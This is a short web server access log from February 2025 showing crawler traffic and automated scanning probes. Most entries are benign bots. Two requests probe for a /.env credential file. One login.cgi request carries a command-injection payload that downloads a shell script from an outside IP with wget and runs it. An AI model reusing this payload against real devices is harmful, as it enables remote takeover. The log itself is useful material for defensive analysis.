156.59.198.136 - - [22/Feb/2025:10:59:06 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-fr.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.185.132.247 - - [22/Feb/2025:11:05:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.255.166.90 - - [22/Feb/2025:11:08:31 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
193.68.89.51 - - [22/Feb/2025:11:10:21 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
159.89.36.16 - - [22/Feb/2025:11:21:49 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
159.89.36.16 - - [22/Feb/2025:11:22:03 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3872.0 Safari/537.36 Edg/78.0.244.0"
216.244.66.235 - - [22/Feb/2025:11:29:43 +0100] "GET /robots.txt HTTP/1.1" 404 375 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.136 - - [22/Feb/2025:11:30:09 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105261703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.121.133.117 - - [22/Feb/2025:11:32:30 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
216.244.66.235 - - [22/Feb/2025:11:39:48 +0100] "GET /?feed=rss2&cat=1 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
156.59.198.135 - - [22/Feb/2025:11:51:04 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_f/awstats-tt-is.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.168 - - [22/Feb/2025:12:10:42 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [22/Feb/2025:12:16:49 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10533053.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
